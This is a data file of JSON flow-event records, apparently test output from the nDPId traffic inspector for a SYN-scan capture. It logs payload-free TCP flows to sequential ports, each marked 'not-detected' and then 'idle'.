+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1241,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1100,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1241,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1100,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1533,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060796,"flow_last_seen":1278275060796,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1102,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1533,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060796,"flow_last_seen":1278275060796,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1102,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1620,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1102,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1620,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1102,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1941,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1104,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1941,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1104,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":438,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059031,"flow_last_seen":1278275059031,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5200,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":438,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059031,"flow_last_seen":1278275059031,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5200,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1981,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1104,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1981,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1104,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1178,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060287,"flow_last_seen":1278275060287,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1105,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1178,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060287,"flow_last_seen":1278275060287,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1105,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":469,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059155,"flow_last_seen":1278275059155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5200,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":469,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059155,"flow_last_seen":1278275059155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5200,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1229,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060387,"flow_last_seen":1278275060387,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1105,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1229,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060387,"flow_last_seen":1278275060387,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1105,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1144,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1106,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1144,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1106,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1582,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060846,"flow_last_seen":1278275060846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1107,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1582,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060846,"flow_last_seen":1278275060846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1107,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1203,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1106,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1203,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1106,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1828,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061158,"flow_last_seen":1278275061158,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1108,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1828,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061158,"flow_last_seen":1278275061158,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1108,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1668,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1107,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1668,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1107,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1903,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061260,"flow_last_seen":1278275061260,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1108,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1903,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061260,"flow_last_seen":1278275061260,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1108,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1943,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1110,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1943,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1110,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1979,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1110,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1979,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1110,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":215,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1111,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":215,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1111,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1033,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060071,"flow_last_seen":1278275060071,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1112,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1033,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060071,"flow_last_seen":1278275060071,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1112,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":241,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1111,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":241,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1111,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1517,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1113,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1517,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1113,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1122,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060182,"flow_last_seen":1278275060182,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1112,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1122,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060182,"flow_last_seen":1278275060182,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1112,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1581,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060846,"flow_last_seen":1278275060846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1113,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1581,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060846,"flow_last_seen":1278275060846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1113,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1395,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060592,"flow_last_seen":1278275060592,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1114,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 